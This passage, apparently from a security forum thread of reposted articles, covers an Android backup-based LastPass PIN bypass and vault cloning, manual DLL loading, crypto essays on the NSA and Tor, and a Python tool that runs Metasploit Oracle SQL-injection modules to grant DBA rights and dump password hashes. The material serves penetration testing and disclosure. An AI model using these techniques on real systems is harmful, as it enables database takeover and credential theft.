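    fields, idx = [], 0
    for _ in range(4):
        end = data.index(b"\n", idx)
        fields.append(data[idx:end])
        idx = end + 1
    magic, version, compressed, encryption = fields
    assert magic == b"ANDROID BACKUP"
    assert encryption == b"none", "encrypted backups need the key-derivation step, not shown here"
    payload = zlib.decompress(data[idx:]) if compressed == b"1" else data[idx:]
    with open(tar_path, "wb") as out:
        out.write(payload)

ab_to_tar("backup.ab", "backup.tar")
print(tarfile.open("backup.tar").getnames())  # look for apps/com.lastpass.lpandroid/sp/LPandroid.xml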
However, the easier and more fun option is the pincodeforreprompt / passwordrepromptonactive and requirepin alteration, which results in the LastPass application not requiring a PIN for entry anymore.

Backup configuration and unpack
Alter XML settings as required
Pack configuration and restore
<<< Profit >>>

After-effects
Some of the more eagle eyed amongst you may have already noticed another interesting attack vector here. The ability to back up LastPass from a device (within 30 seconds if you’re handy ;) and return the device to the owner, coupled with the freedom to restore said backup to an attacker controlled device, makes the attack much more interesting. Not only can you do this, bypass the PIN in your own time, and then read and extract the stored passwords as desired. You can also maintain access to the user’s LastPass account until such time as they change their LastPass password itself. If the original owner alters any of the passwords they store in the LastPass service, the attacker can simply close and restart the cloned Android container to update the information from LastPass’ servers. Note: Version 2.5.1 mentions an alteration in the way LastPass creates UUIDs. This may affect this cloning attack – as yet unconfirmed.

Round 2 – It’s not over yet
You may have noticed the use of quotes around “fix” at the beginning of this post… After LastPass got back to me to say they’d fixed the issue (actually they responded to say they’d fixed it the day before I reported it, as they’d disabled allowBackup and not pushed it to the Play Store yet), I started looking at the proposed fix and possible bypasses based on the same physical access scenario. After a few false starts I have a working bypass for their fix that once again allows the attack (with an additional step). Once they’ve fixed the fix, I’ll let you guys know how that one went down. Until then, make sure you upgrade your LastPass to the latest Play Store version (2.5.1 at this time) and keep an eye out for further fixes!

Links:
android:allowBackup > R.attr | Android Developers
Android ADB > Android Debug Bridge | Android Developers
Python scripts for easier Android Backup fiddling > BSidesLV: Android Backup [un]packer release | Catch22 (in)security / ChrisJohnRiley
LastPass Android (Play Store) > https://play.google.com/store/apps/details?id=com.lastpass.lpandroid

Sursa: A sneak peek into Android “Secure” Containers | Catch22 (in)security / ChrisJohnRiley
-
[h=2]What Is SHA-3 Good For?[/h] Cryptographers are excited because NIST have announced the selection of SHA-3. There are various reasons to like SHA-3, perhaps most importantly because it uses a different design from its predecessors, so attacks that work against them are unlikely to work against it. But if I were paranoid, there’d be something else I’d be thinking about: SHA-3 is particularly fast in hardware. So what’s bad about that? Well, in practice, on most platforms, this is not actually particularly useful: it is quite expensive to get data out of your CPU and into special-purpose hardware – so expensive that hardware offload of hashing is completely unheard of. In fact, even more expensive crypto is hardly worth offloading, which is why specialist crypto hardware manufacturers tend to concentrate on the lucrative HSM market, rather than on accelerators, these days. So, who benefits from high speed hardware? In practice, it mostly seems to be attackers – for example, if I want to crack a large number of hashed passwords, then it is useful to build special hardware to do so. It is notable, at least to the paranoid, that the other recent crypto competition by NIST, AES, was also hardware friendly – but again, in a way useful mostly to attackers. In particular, AES is very fast to key – this is a property that is almost completely useless for defence, but, once more, great if you have some encrypted stuff that you are hoping to crack. The question is, who stands to benefit from this? Well, there is a certain agency who are building a giant data centre who might just like us all to be using crypto that’s easy to attack if you have sufficient resource, and who have a history of working with NIST. Just sayin’. Sursa: Links
-
[h=2]OS X Auditor- Mac Forensics Tool[/h]September 8th, 2013 Mourad Ben Lakhoua

OS X Auditor is a Python-based computer forensics tool. It allows analysts to parse and hash artifacts on the running system or on a copy of a system, so as not to modify the original evidence. The program will look at:
the kernel extensions
the system agents and daemons
the third party’s agents and daemons
the old and deprecated system and third party’s startup items
the users’ agents
the users’ downloaded files
the installed applications

It also extracts:
the users’ quarantined files
the users’ Safari history, downloads, topsites, HTML5 databases and localstore
the users’ Firefox cookies, downloads, formhistory, permissions, places and signons
the users’ Chrome history and archives history, cookies, login data, top sites, web data, HTML5 databases and local storage
the users’ social and email accounts
the WiFi access points the audited system has been connected to (and tries to geolocate them)

This is in addition to looking for suspicious keywords in the .plist files themselves. It can verify the reputation of each file on Team Cymru’s MHR, VirusTotal, Malware.lu or your own local database. You can also aggregate all logs from the following directories into a zipball: /var/log (-> /private/var/log), /Library/logs, and the user’s ~/Library/logs. Finally, the results can be rendered as a simple txt log file (so you can cat-pipe-grep in them… or just grep), rendered as an HTML log file or sent to a Syslog server. You can download the tool by following this link. Sursa: OS X Auditor- Mac Forensics Tool | SecTechno
-
Inside Windows Rootkits By Chad Tilbury on September 4, 2013 Despite being written in 2006, Chris Ries’ paper Inside Windows Rootkits is still surprisingly relevant. About the only thing missing is a discussion of new(er) x64 mitigation techniques like Kernel Mode Code Signing and Kernel Patch Protection (aka PatchGuard). Few resources have explained rootkit internals so simply. As an example, Figure 2 from the paper neatly ties together the rootkit hooking universe: Figure 2: Potential places to intercept a call to the FindNextFile function, Inside Windows Rootkits by Chris Ries The original PDF is a little hard to find these days, but here are a couple of links: Chris Ries- Inside Windows Rootkits http://thehackademy.net/madchat/vxdevl/library/Inside%20Windows%20Rootkits.pdf Sursa: Inside Windows Rootkits | Forensic Methods
-
Loading Win32/64 DLLs "manually" without LoadLibrary() By pasztorpisti, 8 Sep 2013
Download LoadDLL.zip (Visual C++ 2010 solution with example program and C/C++ DLLs) - 20.4 KB

Introduction
Sooner or later many people start thinking about loading a DLL without LoadLibrary(). OK, maybe not so many... It has only a few advantages and can introduce lots of inconvenience when coding the DLL (depending on what your DLL does) compared to loading it with an ordinary LoadLibrary() call, so this technique has limited use. (I will address the inconvenience problems below.) Still, this tip can serve as a tutorial if you want to understand what's going on behind the curtains... I myself used this to write DLLs in C/C++ instead of coding offset-independent assembly (in an anticheat engine), but that is another story.

Implementation
The most important steps of DLL loading are:
Mapping or loading the DLL into memory.
Relocating offsets in the DLL using the relocation table of the DLL (if present).
Resolving the dependencies of the DLL, loading other DLLs needed by this DLL and resolving the offsets of the needed functions.
Calling its entrypoint (if present) with the DLL_PROCESS_ATTACH parameter.

I wrote the code that performed these steps but then quickly found out something is not OK: this loaded DLL doesn't have a valid HMODULE/HINSTANCE handle, and many Windows functions expect you to specify one (for example, GetProcAddress(), CreateDialog(), and so on...). Actually, the HINSTANCE handle of a module is nothing more than the address of the DOS/PE header of the loaded DLL in memory. I tried to pass this address to the functions but it didn't work, because Windows checks whether this handle is really a handle and not just the contents of memory! This makes using manually loaded DLLs a bit harder! I had to write my own GetProcAddress() because the Windows version didn't work with my DLLs. Later I found out that I wanted to use dialog resources in the DLL, and CreateDialog() also requires a module handle to get the dialog resources from the DLL. For this reason I invented my custom FindResource() function that works with manually loaded DLLs and can be used to find dialog resources that can be passed to the CreateDialogIndirect() function. You can use other types of resources as well in manually loaded DLLs if you find a function for that resource that cooperates with FindResource(). In this tip you get the code for the manual DLL loader and GetProcAddress(); I post the resource related functions in another tip.
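To see where steps 2 and 3 above get their data from, here is a minimal, read-only Python sketch (independent of the article's C++ loader) that locates the import and base-relocation data directories of a PE file. Offsets follow the PE/COFF layout; error handling is omitted.

import struct, sys

def pe_directories(path):
    with open(path, "rb") as f:
        data = f.read()
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]        # offset of the PE signature
    assert data[e_lfanew:e_lfanew + 4] == b"PE\0\0"
    opt = e_lfanew + 4 + 20                                    # optional header follows the COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    dir_base = opt + (112 if magic == 0x20B else 96)           # PE32+ vs PE32 data directory offset
    def directory(index):
        rva, size = struct.unpack_from("<II", data, dir_base + index * 8)
        return rva, size
    return {"import": directory(1), "basereloc": directory(5)}

if __name__ == "__main__":
    print(pe_directories(sys.argv[1]))   # e.g. {'import': (rva, size), 'basereloc': (rva, size)}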
Limitations
The loaded DLL doesn't have an HMODULE, so it makes life harder, especially when it's about resources.
The DllMain() doesn't receive DLL_THREAD_ATTACH and DLL_THREAD_DETACH notifications. You could simulate this by creating a small DLL that you load with a normal LoadLibrary() and, from the DllMain() of this normally loaded DLL, call the entrypoint of your manually loaded DLLs on DLL_THREAD_ATTACH/DLL_THREAD_DETACH.
If your DLL imports other DLLs, then the other DLLs are loaded with the WinAPI LoadLibrary(). This is actually not a limitation, just mentioned for your information. Actually, it would be useless to start loading, for example, kernel32.dll with manual DLL loading; most system DLLs would probably malfunction or crash!
I've written my DLLs with the /NODEFAULTLIB linker option, which means you can't reach CRT functions, and it reduces your DLL size considerably (like with 4K intros). But then you have to go with pure WinAPI! Unfortunately the CRT of MS is very complex and relies on the HMODULE of the loaded DLL, so you can't use the CRT. This can be quite inconvenient, but you can overcome it by writing your own mini CRT. I've provided one such mini CRT in my C++ example without attempting to be comprehensive, but it at least allows you to use the most basic C++ features: automatically initialized static variables and the new/delete operators. BTW, if you are about to use this code then you should understand most of these problems, and you should appreciate that writing a C/C++ DLL without the CRT is still much more convenient than writing an offset-independent or relocatable assembly patch.

Using the code
Write your DLL in C/C++ without using the CRT (link with /NODEFAULTLIB).
Load your DLL with the LoadLibrary() code I provided.
You can use my custom GetProcAddress() on the loaded DLL.
If you want to use dialog resources (or some other kind of resource, but dialog is the most common) then you can use the FindResource() function I provided in one of my other tips (and the CreateDialogIndirect WinAPI function), because that works with manually loaded DLLs as well: The inner working of FindResource() and LoadString() Win32 functions.
Download the attached VC++2010 solution that contains a sample program that loads and uses 2 DLLs. One DLL has been written in C and the other in C++.
Sursa: Loading Win32/64 DLLs "manually" without LoadLibrary() - CodeProject
-
Crypto AG Multiple Hagelin Cipher Machine NSA Backdoor Encryption Compromise
Disclosure Date: 1992-03-01

Several Crypto AG machines based on Boris Hagelin's design are known to have a backdoor in the encryption scheme. In 1957, the United States National Security Agency (NSA) brokered a deal with Hagelin allowing them to place a backdoor into the cipher scheme. This allowed the NSA to trivially access secret communications between two devices, as used by the Iranian Islamic regime, Saddam Hussein, Moammar Gadhafi, Ferdinand Marcos, Idi Amin, and even the Vatican. This backdoored access was shared with intelligence agencies in England as well. Not until 1992 was the backdoor finally published.

Location: Context Dependent
Attack Type: Cryptographic
Impact: Loss of Integrity
Solution: Discontinued Product
Exploit: Exploit Private
Disclosure: Uncoordinated Disclosure

Due to the encryption device being compromised through the National Security Agency backdoor, it is widely accepted that it should no longer be used. It is recommended that an alternate, stronger device be used to ensure data is properly protected.
Sursa: 95427: Crypto AG Multiple Hagelin Cipher Machine NSA Backdoor Encryption Compromise
It's not exactly the classic exploit you were expecting, but the story is interesting.
-
[h=1]Chris Hadnagy Nonverbal Human Hacking[/h] As time goes by, and defenses get stronger, attackers are responding by upping their game as well. The techniques and tactics that defenders must contend with keep escalating, making them much more difficult to counter and track. With that in mind, social engineering is the easiest and quickest way into companies. The team at Social-Engineer.Org have analyzed some of the ways that social engineers manipulate their targets and then interviewed some of the top minds in the world on the subjects of con men, persuasion, body language and microexpressions. In addition, we have personally taken training with some of the great minds like Dr. Paul Ekman. All of this has led us to research the topic of non-verbal human hacking. It is a mixture of the principles of NLP, body language and microexpressions used to manipulate targets into an emotional state that allows for control.
-
[h=1]Ange Albertini A Bit More of PE[/h] Among other things, I briefly introduced in Hashdays 2011 (cf hashdays2011.corkami.com) my recent PE experiments, already failing all the tools I tried. I will focus this time only on the PE format, describing in detail the weirdness of the format, pushing it as usual to its limits
-
[h=1]Browser Extensions - The Backdoor To Stealth Malware[/h] Julien Sobrier SOURCE Seattle 2012
-
Building Dictionaries And Destroying Hashes Using Amazon EC2
Nytro posted a topic in Tutoriale video
[h=1]Building Dictionaries And Destroying Hashes Using Amazon EC2[/h] Steve Werby & Randy Todd SOURCE Seattle 2012 -
[h=2]Oracle Exploitation – Privilege Escalation[/h]September 7, 2013 milo2012

Many times during penetration tests, we find a limited account for the Oracle database server. The next step would be to find a SQL injection vulnerability to obtain DBA privileges. There are a number of Metasploit modules that we can use to escalate to DBA privileges. The Metasploit modules below are for different versions of Oracle database servers, and I can't remember which modules apply to which versions. To speed things up, I wrote a script that does the following:
(1) Check if the specified account has access to the database
(2) Check if the account has DBA privileges
(3) If not, check the version of the Oracle database server
(4) Select the relevant Oracle SQL injection modules for that version of Oracle database and write a Metasploit resource script to disk
(5) Run the Metasploit resource script and attempt to gain DBA privileges
(6) Check the account's permissions and verify whether DBA privileges have been obtained

ora_priv.py script
The script is still a work in progress. You can download it via the link below.
https://github.com/milo2012/pentest_scripts/blob/master/oracle_pillage/ora_priv.py

import time
import sys
import csv
import re
import argparse
import urllib
import os.path
import fileinput
import subprocess
import socket
import os
import itertools
from collections import defaultdict
from pprint import pprint
from termcolor import colored
from subprocess import call

sid = ""
metasploitPath = ""
#metasploitPath = "/pentest/metasploit-framework/"
# Made by Keith Lee
# http://milo2012.wordpress.com
# @keith55

try:
    import cx_Oracle
except ImportError:
    print "[!] Please install cx_Oracle"
    sys.exit()

def msfPrivEscUnknown(username,password,hostname,sid):
    # Fallback: try every remaining Oracle SQLi module via a Metasploit resource script
    outputMsfFile = "msfresource.rc"
    myfile = open(outputMsfFile, "w")
    stmt = "setg DBUSER "+username+"\n"
    stmt += "setg DBPASS "+password+"\n"
    stmt += "setg SQL grant dba to "+username+"\n"
    stmt += "setg SID "+sid+"\n"
    stmt += "setg RHOST "+hostname+"\n"
    myfile.write(stmt)
    #Last Attempts
    myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish2\n")
    myfile.write("exploit\n")
    myfile.write("sleep 3\n")
    myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish3\n")
    myfile.write("exploit\n")
    myfile.write("sleep 3\n")
    myfile.write("use auxiliary/sqli/oracle/dbms_metadata_get_granted_xml\n")
    myfile.write("exploit\n")
    myfile.write("sleep 3\n")
    myfile.write("use auxiliary/sqli/oracle/dbms_metadata_get_xml\n")
    myfile.write("exploit\n")
    myfile.write("sleep 3\n")
    myfile.write("use auxiliary/sqli/oracle/dbms_metadata_open\n")
    myfile.write("exploit\n")
    myfile.write("sleep 3\n")
    myfile.write("use auxiliary/sqli/oracle/droptable_trigger\n")
    myfile.write("exploit\n")
    myfile.write("sleep 3\n")
    myfile.write("use auxiliary/sqli/oracle/lt_compressworkspace\n")
    myfile.write("exploit\n")
    myfile.write("sleep 3\n")
    myfile.write("use auxiliary/sqli/oracle/lt_mergeworkspace\n")
    myfile.write("exploit\n")
    myfile.write("sleep 3\n")
    myfile.write("use auxiliary/sqli/oracle/lt_removeworkspace\n")
    myfile.write("exploit\n")
    myfile.write("sleep 3\n")
    myfile.write("use auxiliary/sqli/oracle/lt_rollbackworkspace\n")
    myfile.write("exploit\n")
    myfile.write("sleep 3\n")
    myfile.write("exit\n")
    myfile.close()
    command = metasploitPath+"msfconsole -r "+os.getcwd()+"/msfresource.rc"
    print command
    call(command, shell=True)

def msfPrivEsc(username,password,hostname,sid):
    # Pick the SQLi modules that match the detected Oracle version and run them via msfconsole
    #Check version before doing privilege escalation
    """
    orcl1 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid)
    curs = orcl1.cursor()
    curs.execute("select * from v$version")
    row = curs.fetchone()
    curs.close()
    oracleVer = str(row)
    """
    oracleVer = "10.1"
    outputMsfFile = "msfresource.rc"
    myfile = open(outputMsfFile, "w")
    stmt = "setg DBUSER "+username+"\n"
    stmt += "setg DBPASS "+password+"\n"
    stmt += "setg SQL grant dba to "+username+"\n"
    stmt += "setg SID "+sid+"\n"
    stmt += "setg RHOST "+hostname+"\n"
    myfile.write(stmt)
    #if "9.0" in str(row) or "10.1" in str(row) or "10.2" in str(row):
    if "9.0" in oracleVer:
        myfile.write("use auxiliary/sqli/oracle/dbms_export_extension\n")
        myfile.write("exploit\n")
        myfile.write("sleep 3\n")
        myfile.write("use auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription\n")
        myfile.write("exploit\n")
        myfile.write("sleep 3\n")
    if "9.0" in oracleVer:
        myfile.write("use auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription\n")
        myfile.write("exploit\n")
        myfile.write("sleep 3\n")
    if "10.1" in oracleVer:
        myfile.write("use auxiliary/sqli/oracle/dbms_export_extension\n")
        myfile.write("exploit\n")
        myfile.write("sleep 3\n")
        myfile.write("use auxiliary/sqli/oracle/dbms_cdc_ipublish\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
        myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish\n")
        myfile.write("exploit\n")
        myfile.write("sleep 3\n")
        myfile.write("use auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
        myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
    if "10.2" in oracleVer:
        myfile.write("use auxiliary/sqli/oracle/dbms_export_extension\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
        myfile.write("use auxiliary/sqli/oracle/dbms_cdc_ipublish\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
        myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
        myfile.write("use auxiliary/sqli/oracle/jvm_os_code_10g\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
    if "11.0" in oracleVer:
        myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
    if "11.1" in oracleVer:
        myfile.write("use auxiliary/sqli/oracle/dbms_cdc_ipublish\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
        myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
        myfile.write("use auxiliary/sqli/oracle/jvm_os_code_10g\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
        myfile.write("use auxiliary/sqli/oracle/jvm_os_code_11g\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
        myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
    if "11.2" in oracleVer:
        myfile.write("use auxiliary/sqli/oracle/jvm_os_code_11g\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
        myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n")
        myfile.write("sleep 3\n")
        myfile.write("exploit\n")
    myfile.write("exit\n")
    myfile.close()
    command = metasploitPath+"msfconsole -r "+os.getcwd()+"/msfresource.rc"
    print command
    call(command, shell=True)

def dumpHashes(username,password,hostname,sid):
    # Dump the password hashes once we have enough privileges to read sys.user$
    orcl = cx_Oracle.connect(username+'/'+password+'@'+hostname+':1521/'+sid)
    curs = orcl.cursor()
    curs.execute("SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\'")
    test1 = curs.fetchall()
    print colored("\n[+] Below are the password hashes for SID: "+sid+".","red",attrs=['bold'])
    for i in test1:
        print i
    curs.close()

def checkPermissions(username,password,hostname,sid,firstRun):
    try:
        orcl = cx_Oracle.connect(username+'/'+password+'@'+hostname+':1521/'+sid)
        curs = orcl.cursor()
        curs.execute("select * from v$database")  #Get a list of all databases
        curs.close()
        print colored(str("[+] ["+sid+"]"+" Testing: "+username.strip()+"/"+password.strip()+". (Success)"),"red",attrs=['bold'])
        dumpHashes(username,password,hostname,sid)
        return True
    except cx_Oracle.DatabaseError as e:
        error, = e.args
        if error.code == 1017:
            print "[-] Testing: "+username.strip()+"/"+password.strip()+". (Fail)"
            sys.exit()
        if error.code == 942:
            if firstRun==True:
                print colored("[+] ["+sid+"]"+" Testing: "+username.strip()+"/"+password.strip()+". (Insufficient Privileges). Trying to escalate privileges.","red",attrs=['bold'])
            return False

if __name__=="__main__":
    parser = argparse.ArgumentParser(description='Oracle Privilege Escalation')
    parser.add_argument('-host', help='IP or host name of Oracle server')
    parser.add_argument('-hostFile', dest='hostFile', help='File containing IP addresses of oracle servers')
    parser.add_argument('-u', dest='username', help='Use this username to authenticate')
    parser.add_argument('-p', dest='password', help='Use this password to authenticate')
    parser.add_argument('-sid', dest='sid', help='Use this sid')
    args = vars(parser.parse_args())
    hostList = []
    counter=0
    if args['host']!=None:
        counter+=1
    if args['hostFile']!=None:
        counter+=1
    if args['hostFile']!=None and args['host']==None:
        for line in open(args['hostFile'],'r'):
            hostList.append(line.strip())
    if args['host']!=None and args['hostFile']==None:
        hostList.append(args['host'])
    if counter==0 or counter>1:
        print colored("[+] Please use either -host or -hostFile.","red",attrs=['bold'])
        sys.exit(0)
    if args['sid']!=None:
        sid = args['sid']
    #Check if username/password is provided in the command line
    credCount=0
    if args['username']!=None:
        credCount+=1
    if args['password']!=None:
        credCount+=1
    if credCount==1:  # only one of -u/-p was supplied
        print "[!] You need to provide both -u and -p."
        sys.exit(0)
    #Load hostname
    for hostname in hostList:
        if len(hostname)<1:
            sys.exit(0)
        socketAvail = False
        try:
            socket.setdefaulttimeout(2)
            s = socket.socket()
            s.connect((hostname,1521))
            socketAvail=True
            print "[+] Connected to "+hostname+":1521"
        except:
            print "[-] Cannot connect to "+hostname+":1521"
        if socketAvail==True:
            username = args['username']
            password = args['password']
            print "[+] [sID:"+sid+"] Testing accounts. "
            if checkPermissions(username,password,hostname,sid,firstRun=True)==False:
                print colored("[+] Attempting Metasploit Oracle SQL Privilege Escalation","red",attrs=['bold'])
                msfPrivEsc(username,password,hostname,sid)
                if checkPermissions(username,password,hostname,sid,firstRun=False)==False:
                    print colored("[+] Attempting Additional Oracle SQL Privilege Escalation","red",attrs=['bold'])
                    msfPrivEscUnknown(username,password,hostname,sid)
                    if checkPermissions(username,password,hostname,sid,firstRun=False)==False:
                        print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Unable to Escalate to DBA)","red",attrs=['bold'])
                    else:
                        print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Successfully escalated to DBA)","red",attrs=['bold'])
                else:
                    print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Successfully escalated to DBA)","red",attrs=['bold'])
            else:
                print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Successfully escalated to DBA)","red",attrs=['bold'])

Sursa: Oracle Exploitation – Privilege Escalation | Milo2012's Security Blog
-
Polishing Chrome for Fun and Profit
29/08/2013
Nils & Jon

Agenda
• Introduction
• Google Chrome
• Pwn2Own Vulnerabilities
• Demo

Google Chrome
• Widely considered to be the most secure web browser available
• Designed from the ground up with security in mind
• Lots of security work ongoing
– Code reviews
– Fuzzing (own code & 3rd party)

Download: https://t.co/mZMq4aun1K
-
September 6, 2013
The NSA's Cryptographic Capabilities

The latest Snowden document is the US intelligence "black budget." There's a lot of information in the few pages the Washington Post decided to publish, including an introduction by Director of National Intelligence James Clapper. In it, he drops a tantalizing hint: "Also, we are investing in groundbreaking cryptanalytic capabilities to defeat adversarial cryptography and exploit internet traffic." Honestly, I'm skeptical. Whatever the NSA has up its top-secret sleeves, the mathematics of cryptography will still be the most secure part of any encryption system. I worry a lot more about poorly designed cryptographic products, software bugs, bad passwords, companies that collaborate with the NSA to leak all or part of the keys, and insecure computers and networks. Those are where the real vulnerabilities are, and where the NSA spends the bulk of its efforts.

This isn't the first time we've heard this rumor. In a WIRED article last year, longtime NSA-watcher James Bamford wrote: According to another top official also involved with the program, the NSA made an enormous breakthrough several years ago in its ability to cryptanalyze, or break, unfathomably complex encryption systems employed by not only governments around the world but also many average computer users in the US.

We have no further information from Clapper, Snowden, or this other source of Bamford's. But we can speculate. Perhaps the NSA has some new mathematics that breaks one or more of the popular encryption algorithms: AES, Twofish, Serpent, triple-DES, Serpent. It wouldn't be the first time this happened. Back in the 1970s, the NSA knew of a cryptanalytic technique called "differential cryptanalysis" that was unknown in the academic world. That technique broke a variety of other academic and commercial algorithms that we all thought secure. We learned better in the early 1990s, and now design algorithms to be resistant to that technique. It's very probable that the NSA has newer techniques that remain undiscovered in academia. Even so, such techniques are unlikely to result in a practical attack that can break actual encrypted plaintext.

The naive way to break an encryption algorithm is to brute-force the key. The complexity of that attack is 2^n, where n is the key length. All cryptanalytic attacks can be viewed as shortcuts to that method. And since the efficacy of a brute-force attack is a direct function of key length, these attacks effectively shorten the key. So if, for example, the best attack against DES has a complexity of 2^39, that effectively shortens DES's 56-bit key by 17 bits. That's a really good attack, by the way. Right now the upper practical limit on brute force is somewhere under 80 bits. However, using that as a guide gives us some indication as to how good an attack has to be to break any of the modern algorithms. These days, encryption algorithms have, at a minimum, 128-bit keys. That means any NSA cryptanalytic breakthrough has to reduce the effective key length by at least 48 bits in order to be practical.

There's more, though. That DES attack requires an impractical 70 terabytes of known plaintext encrypted with the key we're trying to break. Other mathematical attacks require similar amounts of data. In order to be effective in decrypting actual operational traffic, the NSA needs an attack that can be executed with the known plaintext in a common MS-Word header: much, much less.
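A small illustration of the arithmetic above, under the essay's own assumptions: a cryptanalytic shortcut that "removes" k bits leaves 2^(n-k) work, and anything much above roughly 2^80 is treated as out of brute-force range. The DES figures mirror the text; the function names are ours.

def effective_strength(key_bits, shortcut_bits=0):
    # bits of work remaining after a shortcut that removes `shortcut_bits` bits
    return key_bits - shortcut_bits

def practically_breakable(effective_bits, limit_bits=80):
    return effective_bits < limit_bits

# DES: 56-bit key, best attack ~2^39, i.e. 17 bits "removed"
print(effective_strength(56, 17), practically_breakable(effective_strength(56, 17)))    # 39 True
# AES-128: an attack would have to shave at least 48 bits just to reach the ~80-bit limit
print(effective_strength(128, 48), practically_breakable(effective_strength(128, 48)))  # 80 False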
So while the NSA certainly has symmetric cryptanalysis capabilities that we in the academic world do not, converting that into practical attacks on the sorts of data it is likely to encounter seems so impossible as to be fanciful. More likely is that the NSA has some mathematical breakthrough that affects one or more public-key algorithms. There are a lot of mathematical tricks involved in public-key cryptanalysis, and absolutely no theory that provides any limits on how powerful those tricks can be. Breakthroughs in factoring have occurred regularly over the past several decades, allowing us to break ever-larger public keys. Much of the public-key cryptography we use today involves elliptic curves, something that is even more ripe for mathematical breakthroughs. It is not unreasonable to assume that the NSA has some techniques in this area that we in the academic world do not. Certainly the fact that the NSA is pushing elliptic-curve cryptography is some indication that it can break them more easily. If we think that's the case, the fix is easy: increase the key lengths. Assuming the hypothetical NSA breakthroughs don't totally break public-cryptography -- and that's a very reasonable assumption -- it's pretty easy to stay a few steps ahead of the NSA by using ever-longer keys. We're already trying to phase out 1024-bit RSA keys in favor of 2048-bit keys. Perhaps we need to jump even further ahead and consider 3072-bit keys. And maybe we should be even more paranoid about elliptic curves and use key lengths above 500 bits. One last blue-sky possibility: a quantum computer. Quantum computers are still toys in the academic world, but have the theoretical ability to quickly break common public-key algorithms -- regardless of key length -- and to effectively halve the key length of any symmetric algorithm. I think it extraordinarily unlikely that the NSA has built a quantum computer capable of performing the magnitude of calculation necessary to do this, but it's possible. The defense is easy, if annoying: stick with symmetric cryptography based on shared secrets, and use 256-bit keys. There's a saying inside the NSA: "Cryptanalysis always gets better. It never gets worse." It's naive to assume that, in 2013, we have discovered all the mathematical breakthroughs in cryptography that can ever be discovered. There's a lot more out there, and there will be for centuries. And the NSA is in a privileged position: It can make use of everything discovered and openly published by the academic world, as well as everything discovered by it in secret. The NSA has a lot of people thinking about this problem full-time. According to the black budget summary, 35,000 people and $11 billion annually are part of the Department of Defense-wide Consolidated Cryptologic Program. Of that, 4 percent -- or $440 million -- goes to "Research and Technology." That's an enormous amount of money; probably more than everyone else on the planet spends on cryptography research put together. I'm sure that results in a lot of interesting -- and occasionally groundbreaking -- cryptanalytic research results, maybe some of it even practical. Still, I trust the mathematics. This essay originally appeared on Wired.com. EDITED TO ADD: That was written before I could talk about this. EDITED TO ADD: The Economist expresses a similar sentiment. Sursa: https://www.schneier.com/blog/archives/2013/09/the_nsas_crypto_1.html
-
[h=3]Tor is still DHE 1024 (NSA crackable)[/h] By Robert Graham

After more revelations, and expert analysis, we still aren't precisely sure what crypto the NSA can break. But everyone seems to agree that if anything, the NSA can break 1024-bit RSA/DH keys. Assuming no "breakthroughs", the NSA can spend $1 billion on custom chips that can break such a key in a few hours. We know the NSA builds custom chips; they've got fairly public deals with IBM foundries to build chips.

The problem with Tor is that it still uses these 1024-bit keys for much of its crypto, particularly because most people are still using older versions of the software. The older 2.3 versions of Tor use keys the NSA can crack, but few have upgraded to the newer 2.4 version with better keys. You can see this for yourself by going to a live listing of Tor servers, like TorStatus - Tor Network Status. Only 10% of the servers have upgraded to version 2.4.

Recently, I ran a "hostile" exit node and recorded the encryption negotiated by incoming connections (the external link encryption, not the internal circuits). This tells me whether they are using the newer or older software. Only about 24% of incoming connections were using the newer software. Here's a list of the counts:

14134 -- 0x0039 TLS_DHE_RSA_WITH_AES_256_CBC_SHA
5566 -- 0xc013 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
2314 -- 0x0016 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
905 -- 0x0033 TLS_DHE_RSA_WITH_AES_128_CBC_SHA
1 -- 0xc012 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA

The older software negotiates "DHE", which are 1024-bit Diffie-Hellman keys. The newer software chooses ECDHE, which are elliptical-curve keys. I show the raw data because I'm confused by the last entry: I'm not sure how the software might negotiate ECDHE+3DES, it seems like a lulz-worthy combination (not that it's insecure -- just odd). Those selecting DHE+3DES are also really old I think. I don't know enough about Tor, but I suspect anything using DHE+3DES is likely more than 5 years old. (By the way, I used my Ferret tool to generate this, typing "ferret suites -r ".)

